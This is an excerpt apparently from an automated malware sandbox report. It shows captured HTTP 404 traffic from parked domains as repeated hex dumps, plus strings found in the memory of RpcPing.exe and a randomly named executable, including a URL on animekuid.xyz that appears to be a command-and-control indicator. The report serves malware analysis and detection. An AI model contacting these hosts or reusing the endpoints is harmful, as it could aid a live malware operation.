d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:36:50 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:36:52 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:36:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 21 6c 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 8e ef 55 aa 57 af af 1c b1 8e 5d be dc 3c 66 d5 ad 74 90 74 30 81 c5 a1 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 36 c9 6c 3c 8a 36 d8 c6 cf 2c 17 01 06 66 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 5a db 7e 67 9c e1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 ab 5c c6 a8 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d 45 7c c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d be a8 bd b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c b8 9e 09 e7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 5c ba d5 86 cf f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a fd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b f0 05 90 c2 c2 46 6c 96 9e 1f 46 a0 10 23 8c 64 e4 d8 30 c0 cc ac 53 ba 36 d2 f9 c9 4e cb 13 6d cc 58 c4 60 6a 28 cd 65 8d de 72 b3 3e 5c dc b3 a3 34 86 e1 a8 cf 6e a9 7a 3b 68 c6 bb da 58 f1 13 b2 62 fc 84 2d fb 60 9f 2d a7 14 3e 5c b4 e8 f6 28 8a 7c 2f cc b4 8d 55 17 20 a0 2b 21 a5 fe 00 13 b8 7e d0 62 1b 2b cf 26 a0 a5 15 a1 f3 9e 6a c1 fa 03 e9 b2 29 52 8d e6 fd 73 ed a5 ed d9 2c e0 e3 c2 10 43 d9 e9 c0 48 2d 97 70 33 8b 3b 22 67 8d 3d 6b ab e7 3b a1 b5 6a f7 94 dd 6f 2c 75 38 48 ec e7 ee 25 39 18 ae a0 47 2b f4 47 81 ad 1a 99 00 c4 ca a5 e6 6f 68 0c 42 a1 28 ae 96 9c a6 28 3d d3 76 c1 17 0f 5e 4d c7 1f 48 27 27 f7 cc 61 0a 82 eb 06 96 a7 b6 ac d5 51 34 c8 24 9b 23 3b d5 52 74 19 0d 32 b9 97 a8 c8 c6 9a a4 d3 f5 1a 21 94 e4 75 5a 18 e9 e0 65 c6 ff 00 28 fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 23 1c 2d 38 61 38 94 de 1c bc 0e 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:37:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 21 6c 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 8e ef 55 aa 57 af af 1c b1 8e 5d be dc 3c 66 d5 ad 74 90 74 30 81 c5 a1 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 36 c9 6c 3c 8a 36 d8 c6 cf 2c 17 01 06 66 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 5a db 7e 67 9c e1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 ab 5c c6 a8 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d 45 7c c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d be a8 bd b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c b8 9e 09 e7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 5c ba d5 86 cf f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a fd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b f0 05 90 c2 c2 46 6c 96 9e 1f 46 a0 10 23 8c 64 e4 d8 30 c0 cc ac 53 ba 36 d2 f9 c9 4e cb 13 6d cc 58 c4 60 6a 28 cd 65 8d de 72 b3 3e 5c dc b3 a3 34 86 e1 a8 cf 6e a9 7a 3b 68 c6 bb da 58 f1 13 b2 62 fc 84 2d fb 60 9f 2d a7 14 3e 5c b4 e8 f6 28 8a 7c 2f cc b4 8d 55 17 20 a0 2b 21 a5 fe 00 13 b8 7e d0 62 1b 2b cf 26 a0 a5 15 a1 f3 9e 6a c1 fa 03 e9 b2 29 52 8d e6 fd 73 ed a5 ed d9 2c e0 e3 c2 10 43 d9 e9 c0 48 2d 97 70 33 8b 3b 22 67 8d 3d 6b ab e7 3b a1 b5 6a f7 94 dd 6f 2c 75 38 48 ec e7 ee 25 39 18 ae a0 47 2b f4 47 81 ad 1a 99 00 c4 ca a5 e6 6f 68 0c 42 a1 28 ae 96 9c a6 28 3d d3 76 c1 17 0f 5e 4d c7 1f 48 27 27 f7 cc 61 0a 82 eb 06 96 a7 b6 ac d5 51 34 c8 24 9b 23 3b d5 52 74 19 0d 32 b9 97 a8 c8 c6 9a a4 d3 f5 1a 21 94 e4 75 5a 18 e9 e0 65 c6 ff 00 28 fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 23 1c 2d 38 61 38 94 de 1c bc 0e 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:37:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 21 6c 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 8e ef 55 aa 57 af af 1c b1 8e 5d be dc 3c 66 d5 ad 74 90 74 30 81 c5 a1 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 36 c9 6c 3c 8a 36 d8 c6 cf 2c 17 01 06 66 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 5a db 7e 67 9c e1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 ab 5c c6 a8 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d 45 7c c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d be a8 bd b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c b8 9e 09 e7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 5c ba d5 86 cf f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a fd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b f0 05 90 c2 c2 46 6c 96 9e 1f 46 a0 10 23 8c 64 e4 d8 30 c0 cc ac 53 ba 36 d2 f9 c9 4e cb 13 6d cc 58 c4 60 6a 28 cd 65 8d de 72 b3 3e 5c dc b3 a3 34 86 e1 a8 cf 6e a9 7a 3b 68 c6 bb da 58 f1 13 b2 62 fc 84 2d fb 60 9f 2d a7 14 3e 5c b4 e8 f6 28 8a 7c 2f cc b4 8d 55 17 20 a0 2b 21 a5 fe 00 13 b8 7e d0 62 1b 2b cf 26 a0 a5 15 a1 f3 9e 6a c1 fa 03 e9 b2 29 52 8d e6 fd 73 ed a5 ed d9 2c e0 e3 c2 10 43 d9 e9 c0 48 2d 97 70 33 8b 3b 22 67 8d 3d 6b ab e7 3b a1 b5 6a f7 94 dd 6f 2c 75 38 48 ec e7 ee 25 39 18 ae a0 47 2b f4 47 81 ad 1a 99 00 c4 ca a5 e6 6f 68 0c 42 a1 28 ae 96 9c a6 28 3d d3 76 c1 17 0f 5e 4d c7 1f 48 27 27 f7 cc 61 0a 82 eb 06 96 a7 b6 ac d5 51 34 c8 24 9b 23 3b d5 52 74 19 0d 32 b9 97 a8 c8 c6 9a a4 d3 f5 1a 21 94 e4 75 5a 18 e9 e0 65 c6 ff 00 28 fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 23 1c 2d 38 61 38 94 de 1c bc 0e 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:37:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 6f 72 65 78 33 33 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.000000000358C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://animekuid.xyz/7un9/?tpTd=4XOwgplivDvk/EZOubh
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
